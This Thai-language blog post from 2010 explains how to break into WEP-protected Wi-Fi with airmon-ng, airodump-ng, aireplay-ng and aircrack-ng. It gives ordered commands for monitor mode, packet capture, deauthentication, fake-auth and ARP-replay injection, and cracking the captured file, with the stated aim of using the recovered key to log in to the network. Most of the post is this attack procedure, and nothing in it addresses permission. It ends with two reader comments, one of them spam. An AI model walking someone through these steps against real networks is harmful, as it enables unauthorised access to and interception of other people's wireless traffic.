Pages

9/12/2010

วิธี hack wireless ที่ป้องกันด้วยระบบ WEP

หลังจากอ่านมาหลายที่  สุดท้ายโปรแกรมหลักๆ ที่ใช้ในการ จัดการกับเรื่องนี้ มีอยู่สี่ตัว คือ
airmon-ng, airodump-ng, aircrack-ng, aireplay-ng

โดยแต่ละตัว ทำหน้าที่คือ

  • airmon-ng       ทำการเปิดระบบให้wireless card เราอยู่ใน mode ที่ monitor traffic ได้
  • airodump-ng   ดักจับ packet ที่วิ่งอยู่ในอากาศ  โดยเราสามารถฟิลเตอร์ได้ว่าจะเอาเฉพาะที่มาจากwireless ตัวไหน ช่องไหน
  • aircrack-ng      รับข้อมูลที่ได้มาจากการ dump เพื่อมาแกะหา pass key ที่จะใช้ในการเข้าไปใช้ wireless
  • aireplay-ng      ไว้สำหรับเล่นกับตัวwireless access point เพื่อทำเร่งให้มี traffic เยอะๆ จะได้ดักจับ และแกะ pass key ได้ง่ายขึ้น


หลักการคร่าวๆ คือ

  1. เปิดระบบให้ wireless card ทำตัวแบบรับ traffic ได้
  2. หา และดักจับ traffic ในอากาศ เฉพาะตัว wireless APที่ต้องการเข้าใช้ และบันทึกลงไฟล์
  3. [Optional]  เพื่อความรวดเร็ว อาจจะใช้การจำลองส่งข้อมูลเข้าไปที่ wireless AP เพื่อสร้างให้เกิด traffic เพิ่มขึ้นมาได้  จะได้ดักจับได้จำนวนมากๆ
  4. นำไฟล์ที่เก็บ packet ต่างๆไว้ มา crack  เพื่อหา pass key ของ wireless AP ตัวนั้น


คำสั่งต่างๆ แบบเรียงลำดับการใช้งาน
(* wireless intf == ชื่ออุปกรณ์wireless เช่น  wlan0, mon0)
เปิดการใช้งาน Wireless Interface
airmon-ng           ; เพื่อเช็คว่า wireless interface ชื่ออะไร
airmon-ng stop [wireless intf]         ; หยุดการทำงานก่อน
airmon-ng start [wireless intf]        ; เริ่มการทำงานใหม่ ในโหมด monitor
[ ถ้าใช้ได้แล้ว  airmon-ng อีกครั้ง จะเห็นว่ามีิิอุปกรณ์wirelessใหม่ขึ้นมาชื่อ mon0 ซึ่งเราจะเอาไปใช้ต่อไป]

เริ่มค้นหาและดักจับข้อมูล
airodump-ng mon0       ; เช็คดูว่า มี wireless AP อะไรอยู่บ้าง
เลือก AP ที่ต้องการ โดยจำ channel, bssid ของมันไว้ แล้วกด Ctrl+C เพื่อหยุดคำสั่งนี้
airodump-ng -w wep -c [channel number] --bssid [bssid number]  mon0      ;เพื่อเริ่ม dump ข้อมูล traffic ที่วิ่งเข้า/วิ่งออก wireless AP ตัวนั้น แล้วเก็บไว้ในไฟล์    wep-**.cap 
ปล่อย airodump-ng รันไว้เรื่อยๆ ก่อน

[optional] กระตุ้นให้ traffic มากขึ้น
aireplay-ng -0 -a [bssid] -c [a client's mac] mon0   ;เพื่อหลอกว่าเราจะlogout แต่ความจริงแค่เอา ACK เท่านั้น (สามารถใช้เก็บค่า handshaking key ใน wpa ได้ด้วย)
aireplay-ng -1 0 -a [bssid] mon0     ;เพื่อปลอมว่าเราจะพยายาม login เข้าไปใช้wireless ตัวนี้ (fakeauth)
aireplay-ng -3 -b [bssid] mon0      ; เพื่อโจมตีด้วยการสร้าง Arp-request ไปเรื่อยๆเพื่อให้เกิดข้อมูลวิ่งเข้าวิ่งออก (arpreplay)
กด Ctrl+C เพื่อหยุดเมื่อได้จำนวนข้อมูลที่ดักจับได้ เป็นจำนวนที่พอใจแล้ว

แกะรหัสผ่าน
เมื่อได้ข้อมูลมามากพอสมควร  (บางที่บอก > 5000, บางที่บอก >30,000, แต่ยิ่งมากก็ยิ่งดี) โดยดูจากคำสั่ง airodump-ng ที่รันอยู่
จะพบว่า airodump-ng นั้นสร้าง ไฟล์ออกมา  (.cap)   ในที่นี้ไฟล์ต่างๆจะขึ้นต้นด้วย wep

ให้เรานำไฟล์แรกของชุดไฟล์นั้นเข้าไปในคำสั่ง  (ในที่นี้คือ wep-01.cap)
aircrack-ng  [filename]          ; เพื่อทำการ crack หา pass key ของ wireless AP นั้น  
เมื่อได้ pass key มาแล้ว เราก็จะเอาไปใช้ในการ login เพื่อใช้ในการ เข้าไปใช้ wireless AP นั้นต่อไป




VDO

2 comments:

  1. ขอบคุณครับผมลองทำตามจนถึง
    aireplay-ng 'เพิ่มData อะคับ
    มัน Read เป็นพันแล้ว แต่ไม่ยอม ส่ง Packet ไปอะ - -'
    (Access Point บ้านตัวเอง)
    เป็นเพราะอะไรหรอครับ

    ReplyDelete
  2. This kind of wireless connection technology has so many applications. Although the market is very hard, we be believe it must increase in the next year.this site

    ReplyDelete